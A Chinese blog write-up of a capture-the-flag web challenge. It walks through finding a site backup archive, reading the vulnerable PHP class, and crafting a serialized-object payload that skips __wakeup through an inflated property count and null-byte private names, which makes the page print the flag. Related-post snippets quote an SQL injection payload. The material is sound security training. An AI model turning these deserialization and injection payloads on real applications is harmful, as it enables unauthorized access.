[BUUCTF]PHP (writeup)

最新推荐文章于 2024-07-12 23:54:36 发布
最新推荐文章于 2024-07-12 23:54:36 发布
阅读量108 收藏
点赞数
分类专栏: buuctf--web 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63306244/article/details/131418202
版权

进入后他页面提示有备份网站的习惯

那我们就拿工具扫一下

发现了www.zip

下载后发现了index.php class.php flag.php 三个文件

 依次访问三个文件

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

index.php

<!DOCTYPE html>
<head>
  <meta charset="UTF-8">
  <title>I have a cat!</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
      <link rel="stylesheet" href="style.css">
</head>
<style>
    #login{   
        position: absolute;   
        top: 50%;   
        left:50%;   
        margin: -150px 0 0 -150px;   
        width: 300px;   
        height: 300px;   
    }   
    h4{   
        font-size: 2em;   
        margin: 0.67em 0;   
    }
</style>
<body>

 看到class.php底下有一段输出flag的代码

 function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;

分析:
如果password不等于100,输出No!!!hacker;

所以password需要等于100;

下面username全等于admin;

才能输出flag

所以构造序列化语句

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
$a=new Name;
echo serialize($a);
?>

得到结果

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

虽然得到了结果

但是是错的,看了大佬的wp才知道要构造这样的序列化语句

<?php
 
 
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
 
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin',100);
 
var_dump(serialize($a))
 
?>

得到这样的结果

string(77) "O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}"

然后发现了参数select

 于是我们将参数值给select,但是在反序列化的时候会首先执行__wakeup()魔法方法,这个方法会把我们的username重新赋值,所以我们考虑如何跳过__wakeup(),而去执行__destruct

在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup(),即把Name后面的数字2该为大于2的数字,于是我们这样构造payload:

?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

接着我们发现,username和password为private声明的变量。因为username和password是私有变量,变量中的类名前后会有空白符,而复制的时候会丢失,所以要加上%00因此私有字段的字段名在序列化的时候,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度

得到payload

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}


 这上面一段是拿大佬的,文章-->在这里

xiao孩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
web渗透writeup
09-11
在提供的源码中,`$sql = "select pw from php where user='$user'";`这条SQL语句没有对用户输入的$user变量进行任何过滤或转义,这使得攻击者可以通过构造特定的输入来改变SQL查询的执行逻辑。虽然不能直接通过SQL...
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4319
BUUCTF--Web篇详细wp。
BUUCTF笔记之Web系列部分WriteUp(二)
克格莫
05-17 2169
1、[极客大挑战 2019]Http 不敢置信12世纪了还有这种简单题,我还在拼命扫目录和备份。。。。 在secret.php重发http请求头 Referer: https://www.Sycsecret.com 修改User-Agent为Syclover: 这里伪造来源IP 添加一个字段X-Forwarded-For: 127.0.0.1 拿到flag. ...
BUUCTF解题web十一道(02)
qq_45837896的博客
06-01 1005
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
BUUCTF:[极客大挑战 2019]PHP
末初的CSDN博客
10-20 964
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP 根据提示找到www.zip进行下载 //index.php <!DOCTYPE html> <head> <meta charset="UTF-8"> <title>I have a cat!</title> <link rel="styles.
反序列化漏洞——I Hvae A Cat
sGanYu
09-21 1486
【因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯 不愧是我!!! 】 根据题目提示的备份网站,可以使用网站备份文件的字典进行爆破,得到www.zip备份文件 下载后解压里面的class.php、flag.php和index.php文件 一开始以为是简单的扫后台路径得到flag,在flag.php提交flag时出错,好吧果然不是这么简单的 代码审计其余两个php文件 其中index.php <?php include 'class.php'; ..
古典加密writeup
01-05
做CTF时遇到的古典加密的问题,自己写的writeup,信息安全专业的
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
WriteUp模板1
08-08
WriteUp模板1-文档编写指南 WriteUp模板1是用于编写解题报告的模板,旨在帮助参与校赛的选手编写高质量的解题报告。本文将详细介绍 WriteUp 模板1 的结构和编写要求,帮助选手更好地编写解题报告。 标题 WriteUp ...
BUUCTF__web题解合集(五)
风过江南乱的博客
08-10 991
1、[BJDCTF2020]The mystery of ip 2、[BJDCTF2020]Cookie is so stable 3、[WesternCTF2018]shrine 4、[BJDCTF2020]ZJCTF,不过如此 5、[CISCN 2019 初赛]Love Math
BUUCTF-部分Web题WP
lqyzkn的博客
10-04 747
[HCTF 2018]WarmUp PHP 代码审计 WP: 拿到题目查看源码,发现一个文件 打开后得到如下源码: 按照提示访问hint.php文件,得到提示: 猜想flag在ffffllllaaaagggg文件里,然后进行php代码审计,发现flag可能包含在file文件夹里了,经过多次尝试目录穿越,得到flag: 当然,这里用hint.php也行。 [极客大挑战 2019]Havefun WP: 打开网址查看源码: 看见一段被注释掉的PHP代码。代码提示,如果请求page?cat=xxx,在
CTF-Web-[极客大挑战 2019]PHP
归子莫的博客
05-03 2162
CTF-Web-[极客大挑战 2019]PHP 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]PHP 打开题目的实例 思路 看到这种题目,我爱了 特别是这个动画效果...
BUUCTF自习笔记第一页加第二页一道笔记
小学生的博客
04-10 1282
有这样一道题目: 【极客大挑战 2019HardSQL】 题目描述呢,是一道SQL的注入题目,本着题目不会在注入点设置太大难度的想法,笔者上来先尝试使用or '1' = '1 'or'1'='1这样逻辑判断尝试,结果发现设置了字符被识别判定,一无所获。 做个备份: payload: 获取表名: admin’^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(tab
BUUCTF [极客大挑战 2019] Havefun
Senimo
03-24 599
BUUCTF [极客大挑战 2019] Havefun writeup 启动靶机,访问题目: 页面只有猫和作者信息,查看网页源码: </div> <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat...
Laravel Excel导出功能:高效实现数据导出
liuxin33445566的博客
07-08 1178
Laravel Excel导出功能允许开发者将查询结果或其他数据集合转换成Excel格式的文件。这不仅可以提高数据交换的效率,还可以提升用户体验。Laravel Excel支持自定义导出格式,包括自定义单元格样式、合并单元格、添加图片等。这可以通过实现WithEvents等接口来实现。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 313
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相关的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
三级_网络技术_14_局域网技术基础及应用
最新发布
2301_80961833的博客
07-12 193
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 204
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值